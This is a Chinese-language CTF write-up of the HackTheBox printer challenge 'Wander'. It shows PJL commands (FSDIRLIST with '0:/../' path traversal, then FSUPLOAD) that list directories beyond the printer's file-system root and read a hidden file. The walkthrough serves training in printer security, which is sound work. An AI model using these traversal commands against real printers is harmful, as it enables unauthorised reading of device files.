概述
HackTheBox 是一个经典的在线靶机平台,提供了大量漏洞演练和CTF演练场景。
本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击目标之一。研究表明,打印机存在较多攻击面,使它们很容易遭受攻击。
声明
本文是对HackTheBox 专业靶场的演练记录,文中使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和方法用于任何非法用途,请务必遵守《网络安全法》。
题目概述
本次靶机为Wander.,题目地址https://app.hackthebox.com/challenges/239
启动实例后,靶机地址为209.97.187.217:31608
访问http://209.97.187.217:31608/得到如下页面
点击Job Controls,得到如下页面
bing搜索关键字printer Job Controls @pjl info id
在https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf 的第九章JL File System中看到FSDIRLIST
命令
题目解答
输入@PJL FSDIRLIST NAME="0:" ENTRY=1
接下来输入@PJL FSDIRLIST NAME="0:/../" ENTRY=1
查看上一层目录,可以看到有etc、conf、home等目录
查看home目录@PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
,得到default目录,继续深入@PJL FSDIRLIST NAME="0:/../home/default" ENTRY=1
得到readyjob TYPE=FILE SIZE=457
接着使用图中的FSUPLOAD
命令
@PJL FSUPLOAD NAME="0:/../home/default/readyjob"
得到flag